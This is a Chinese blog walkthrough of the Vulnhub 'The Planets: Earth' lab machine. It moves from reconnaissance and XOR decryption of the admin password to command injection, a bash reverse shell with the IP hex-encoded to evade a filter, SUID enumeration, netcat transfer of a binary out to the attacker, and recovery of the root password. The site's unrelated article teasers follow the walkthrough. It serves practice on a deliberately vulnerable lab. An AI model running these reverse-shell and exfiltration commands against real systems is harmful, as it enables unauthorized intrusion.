Vulnhub系列靶机-The Planets Earth

文章目录

  • Vulnhub系列靶机-The Planets: Earth
    • 1. 信息收集
      • 1.1 主机扫描
      • 1.2 端口扫描
      • 1.3 目录爆破
    • 2. 漏洞探测
      • 2.1 XOR解密
      • 2.2 解码
    • 3. 漏洞利用
      • 3.1 反弹Shell
    • 4. 权限提升
      • 4.1 NC文件传输
    • Netcat(nc)文件传输

Vulnhub系列靶机-The Planets: Earth

1. 信息收集

1.1 主机扫描

arp-scan -l

image-20230927130107003

1.2 端口扫描

nmap -p- -A 192.168.188.198

image-20230927130537258

发现靶机开启了22,80,443端口

访问页面

image-20230927130523482

页面报错误请求400,在hosts文件中加入DNS解析

image-20230927132521888

访问http://earth.local/

image-20230927132654049

1.3 目录爆破

dirsearch -u http://earth.local/ -e * -i 200

image-20230927132848042

爆破出来了/admin/login目录,浏览器中访问一下,发现是一个登录页面。

image-20230927132906526

对另一个页面进行目录爆破

dirsearch -u https://terratest.earth.local/ -i 200

image-20230927133102538

2. 漏洞探测

页面访问一下robots.txt

image-20230927133444295

发现除了常规的格式不能访问之外,最后有一个Disallow: /testingnotes.*,和上面的后缀格式拼接访问txt文件。

image-20230927133623676

翻译页面

测试安全消息传递系统注意事项:
*使用异或加密作为算法,应该与RSA中使用的一样安全。
*地球已经确认他们收到了我们发送的信息。
*testdata.txt用于测试加密。
*terra用作管理员门户的用户名。
待办事项:
*我们如何安全地将每月的钥匙发送到地球?或者我们应该每周换一次钥匙?
*需要测试不同的密钥长度以防止暴力。钥匙应该有多长?
*需要改进消息传递界面和管理面板的界面,这是目前非常基本的。

到这里我们知道,加密算法是XOR,用户名是terra,并且还有一个testdata.txt用于测试加密。

页面访问/testdata.txt

image-20230927134115574

翻译如下

根据放射性测年法和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,生命出现在海洋中,并开始影响地球的大气和表面,导致厌氧生物和后来的好氧生物的增殖。一些地质证据表明,生命可能早在41亿年前就出现了。

回到之前的页面在http://earth.local/下面有三串数据

image-20230927134414332

通过三个秘钥去尝试找到用户名为terra对应的密码

2.1 XOR解密

XOR,全称为Exclusive OR(异或),是一种逻辑运算符。XOR常用于数据加密、校验和计算。

将Previous Messages与testdata.txt进行XOR运算,这里我们编写脚本来XOR解密。

import binasciidata1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1,16) ^ int(f,16)))
print(hex(int(data2,16) ^ int(f,16)))
print(hex(int(data3,16) ^ int(f,16)))

image-20230927135949549

testdata.txt文件内容。

image-20230927140001760

执行脚本,获得的三串数据都是十六进制的

image-20230927135925396

2.2 解码

使用utools中的解码工具进行解码。

第一串字符

image-20230927140211738

第二串字符

image-20230927140246130

第三串字符

image-20230927140301832

可以看到前两个没有重要数据,第三个是重复的earthclimatechangebad4humans

尝试用户名和密码进行登录

terra
earthclimatechangebad4humans

登录成功

image-20230927140429479

观察页面发现可以执行命令

image-20230927140512168

命令执行漏洞

查看是否有flag文件,发现一个/var/earth_web/user_flag.txt

image-20230928105920217

查看/var/earth_web/user_flag.txt文件

image-20230928110019890

获取到第一个flag

3. 漏洞利用

3.1 反弹Shell

既然可以执行命令那么我们可以反弹shell

bash -i &> /deb/tcp/192.168.188.198/8888 0>&1

image-20230928110304077

发现远程连接被禁止了。

这种情况可以对IP地址进行十六进制编码或者对整个命令进行base64编码。这里我选择对IP地址进行十六进制编码。

IP地址进制转换。

image-20230928112007120

bash -i >& /dev/tcp/0XC0A8BC9D/8888 0>&1

然后kali主机上监听8888端口

nc -lnvp 8888 -e /bin/bash

image-20230928110807145

反弹成功

image-20230928112032498

查看当前用户的权限

image-20230928112110207

发现权限较低,尝试进行提取。

4. 权限提升

查看一些特殊权限的文件

find / -perm -u=s -type f 2>/dev/null

命令解析

  • -perm -u=s:表示通过文件权限来匹配文件。其中,-perm用于指定要匹配的权限,-u表示用户权限,而s表示SetUID权限。SetUID权限(Set User ID)是一种特殊的权限位,当用户执行该文件时,会以该文件的所有者的身份来执行。
  • -type f:表示只匹配普通文件(regular file)。这里的f表示文件。
  • 2>/dev/null:将错误输出(stderr)重定向到/dev/null,即丢弃错误信息。

image-20230928112543425

看到reset_root文件,尝试运行

image-20230928113543273

发现无法运行。

4.1 NC文件传输

使用nc进行传输文件

在Kali上输入nc -nlvp 7788 >reset_root,开启监听

image-20230928113814804

在靶机中输入如下命令

nc 192.168.188.157 7788 < /usr/bin/reset_root

image-20230928114240548

命令解析:

  • 使用Netcat(nc)工具将 /usr/bin/reset_root 文件发送到 IP 地址为 192.168.188.157 的接收端的 7788 端口。

strace调试工具

使用strace工具检测reset_root文件的运行过程,如果没有可以进行下载。

sudo apt install strace

image-20230928114428439

对reset_root进行调试,给reset_root文件赋予执行权限

chmod +x reset_root
strace ./reset_root

命令解析

  • strace是一个用于跟踪进程系统调用和信号的工具
    • strace:表示启动strace工具。
    • ./reset_root:表示要执行的可执行文件或命令。

image-20230928114616938

image-20230928114700775

发现文件执行失败是因为少了这三个文件或目录。

在靶机shell上创建这三个文件

进入靶机终端进行创键

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

image-20230928114836255

创建完成后执行reset_root

image-20230928115122133

获取到了root的密码:Earth

成功获得root权限,得到最后的flag

image-20230928115214457

image-20230928115239569

Netcat(nc)文件传输

使用Netcat(nc)进行文件传输可以在计算机之间快速传输文件。Netcat是一个网络工具,它能够创建网络连接、发送和接收数据。

详细步骤:

  1. 在接收端启动监听

    nc -l -p <port> > received_file
    

    在接收端运行上述命令来监听指定的端口。-l 参数表示监听模式,-p <port> 参数用于指定监听的端口号。所有传入的数据将被重定向到 received_file 文件中。

  2. 在发送端发送文件

    nc <receiver_ip> <receiver_port> < file_to_send
    

    在发送端运行上述命令来发送文件。<receiver_ip> 是接收端的 IP 地址,<receiver_port> 是接收端开放的端口号,< file_to_send 是要发送的文件名或路径。Netcat将会将文件的内容通过网络发送到接收端。

  3. 接收端接收文件:

    接收端会将数据写入 received_file 指定的文件中。你可以在接收端的文件系统中找到该文件,并对其进行进一步处理。

在使用的时候确保以下几点:

  • 发送端和接收端之间存在网络连接,并且网络设置正确。
  • 接收端的端口没有被防火墙或其他网络安全设备阻塞。
  • 发送端和接收端都有足够的权限读取和写入文件。
  • 确保文件路径和文件名是正确的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/98913.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

软件工程师都应该知道的10个定律

一、海勒姆法则 内容 当一个 API 有足够多的用户&#xff0c;你在契约中承诺了什么并不重要&#xff1a;系统中所有看得见的行为都会有某个人依赖…… 案例 现在有两个系统A和B&#xff0c;B的一个接口返回一个列表。A系统的开发人员发现返回的列表都是按照ID正向排序的。本…

Flink实现kafka到kafka、kafka到doris的精准一次消费

1 流程图 2 Flink来源表建模 --来源-城市topic CREATE TABLE NJ_QL_JC_SSJC_SOURCE ( record string ) WITH (connector = kafka,topic = QL_JC_SSJC,properties.bootstrap.servers = 172.*.*.*:9092,properties.group.id = QL_JC_SSJC_NJ_QL_JC_SSJC_SOURCE,scan.startup.mo…

基于Springboot实现疫情网课管理系统项目【项目源码+论文说明】分享

基于Springboot实现疫情网课管理系统演示 摘要 随着科学技术的飞速发展&#xff0c;各行各业都在努力与现代先进技术接轨&#xff0c;通过科技手段提高自身的优势&#xff1b;对于疫情网课管理系统当然也不能排除在外&#xff0c;随着网络技术的不断成熟&#xff0c;带动了疫情…

学习开发一个RISC-V上的操作系统(汪辰老师) — unrecognized opcode `csrr t0,mhartid‘报错问题

前言 &#xff08;1&#xff09;此系列文章是跟着汪辰老师的RISC-V课程所记录的学习笔记。 &#xff08;2&#xff09;该课程相关代码gitee链接&#xff1b; &#xff08;3&#xff09;PLCT实验室实习生长期招聘&#xff1a;招聘信息链接 正文 &#xff08;1&#xff09;在跟着…

three.js点击模型实现模型边缘高亮选中效果

three.jsreact实现点击模型实现高亮选中效果 1、创建一个场景 let scene, camera, renderer, controls; let stats null; // 检测动画运行时的帧数 let clock new THREE.Clock(); // getDelta()方法获得两帧的时间间隔 let FPS 30; let renderT 1 / FPS; let timeS 0;con…

SpringBoot中使用拦截器

拦截器属于MVC中的内容 SpringBoot项目,引入web依赖即可 需要访问的控制器 拦截器第一步实现HandlerInterceptor接口 第二步实现WebMvcConfigurer接口,并重写addInterCeptors()方法,将自定义的拦截器注册 也就是说这里add进去拦截的请求,才会进入到prehandle方法,这里放行的请…

kafka与zookeeper的集群

基础配置 systemctl stop firewalld && systemctl disable firewalld setenforce 0 sed -i s/SELINUXenforcing/SELINUXdisabled/ /etc/selinux/configvi /etc/hosts ip1 node1 ip2 node2 ip3 node3zookeeper介绍 zookeeper是一个分布式的协调服务&#xff0c;主要用…

计算机竞赛 : 题目:基于深度学习的水果识别 设计 开题 技术

1 前言 Hi&#xff0c;大家好&#xff0c;这里是丹成学长&#xff0c;今天做一个 基于深度学习的水果识别demo 这是一个较为新颖的竞赛课题方向&#xff0c;学长非常推荐&#xff01; &#x1f9ff; 更多资料, 项目分享&#xff1a; https://gitee.com/dancheng-senior/pos…

[天翼杯 2021]esay_eval - RCE(disabled_function绕过||AS_Redis绕过)+反序列化(大小写wakeup绕过)

[天翼杯 2021]esay_eval 1 解题流程1.1 分析1.2 解题1.2.1 一阶段1.2.2 二阶段 二、思考总结 题目代码&#xff1a; <?php class A{public $code "";function __call($method,$args){eval($this->code);}function __wakeup(){$this->code "";…

虚拟机Ubuntu18.04安装对应ROS版本详细教程!(含错误提示解决)

参考链接&#xff1a; Ubuntu18.04安装Ros(最新最详细亲测)_向日葵骑士Faraday的博客-CSDN博客 1.4 ROS的安装与配置_哔哩哔哩_bilibili ROS官网&#xff1a;http://wiki.ros.org/melodic/Installation/Ubuntu 一、检查cmake 安装ROS时会自动安装旧版的Cmake3.10.2。所以在…

uniapp 在uni.scss 根据@mixin定义方法 、通过@include全局使用

在官方文档中提及到uni.scss中变量的使用&#xff0c;而我想定义方法&#xff0c;这样写css样式更方便 一、官方文档的介绍 根据官方文档我知道&#xff0c;在这面定义的变量全局都可使用。接下来我要在这里定义方法。 二、在uni.scss文件中定义方法 我在uni.scss文件中定义了…

12P4375X042-233C KJ2005X1-BA1 CE3007 EMERSON servo controller

12P4375X042-233C KJ2005X1-BA1 CE3007 EMERSON servo controller 我们提供三种不同类别的EDGEBoost I/O模块供选择&#xff0c;以实现最大程度的I/O定制: 数字和模拟输入/输出网络和连接边缘人工智能和存储 利用EDGEBoost I/O实现变革性技术 EBIO-2M2BK EBIO-2M2BK载板支持…

conda安装使用jupyterlab注意事项

文章目录 一、conda安装1.1 conda安装1.2 常见命令1.3 常见问题 二、jupyterlab2.1 jupyterlab安装和卸载2.2 常见错误2.2.1 版本冲突&#xff0c;jupyterlab无法启动2.2.2 插件版本冲突 2.3 常用插件2.3.1 debugger2.3.2 jupyterlab_code_formatter 2.4 jupyter技巧 一、conda…

ThreeJS-3D教学七-交互

在threejs中想要选中一个物体&#xff0c;点击或者鼠标悬浮&#xff0c;又或者移动端的touch事件&#xff0c;核心都是通过new THREE.Raycaster完成的。这里用到了一个概念&#xff0c;即我们点击时的 屏幕坐标 转换为 three中的3D坐标。 先看效果图&#xff1a; 代码是&#…

掌握这3点,企业就能规避收款业务中的合规风险

随着国家政策监管日趋严格&#xff0c;企业合规管理正在受到高度关注。在企业收业务款场景中&#xff0c;银行回单管理容易被忽略&#xff0c;若处理不当&#xff0c;将面临合规风险。具体表现如下&#xff1a; 审计依据不充分 银行回单是企业内部控制和合规管理的重要组成部…

vue3 集成 tailwindcss

tailwindcss 介绍 Tailwind CSS 是一个流行的前端框架&#xff0c;用于构建现代、响应式的网页和 Web 应用程序。它的设计理念是提供一组可复用的简单、低级别的 CSS 类&#xff0c;这些类可以直接应用到 HTML 元素上&#xff0c;从而加速开发过程并提高样式一致性。 主要特点…

大语言模型学到什么

背景&#xff1a; 这篇文章是对《LANGUAGE MODELS REPRESENT SPACE AND TIME》论文的翻译加解读。之所以选这篇文章是因为最近在研究大模型的可解释性&#xff0c;以及基于可解释性对大模型的下游任务适配做训练级别可控性增强研究。其实总结成两句话就是&#xff1a; 1.大模…

Spring【@Resource、@Autowired+lombook+Bean的生命周期】

Resource 和 Autowired 的区别 在Spring中找Bean的两种方式&#xff1a;①先根据类型查找②再根据名称查找 Autowired先根据类型查找&#xff0c;再根据名称查找【根据上述查找结果不唯一&#xff0c;再添加一个 Qualifier(value“”)&#xff0c;就可以查找】 Resource先根据名…

【12】c++设计模式——>单例模式练习(任务队列)

属性&#xff1a; &#xff08;1&#xff09;存储任务的容器&#xff0c;这个容器可以选择使用STL中的队列&#xff08;queue) &#xff08;2&#xff09;互斥锁&#xff0c;多线程访问的时候用于保护任务队列中的数据 方法&#xff1a;主要是对任务队列中的任务进行操作 &…

【C++ 学习 ㉖】- 布隆过滤器详解(哈希扩展)

目录 一、布隆过滤器的简介 二、布隆过滤器的实现 2.1 - BloomFilter.h 2.2 - test.cpp 一、布隆过滤器的简介 布隆过滤器&#xff08;Bloom Filter&#xff09;是由 Burton Howard Bloom 在 1970 年提出的一种紧凑型的、比较巧妙的概率型数据结构&#xff08;probabilist…